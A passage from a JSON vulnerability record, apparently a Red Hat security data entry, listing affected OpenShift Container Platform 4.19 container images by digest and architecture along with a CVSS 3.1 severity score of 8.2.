"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
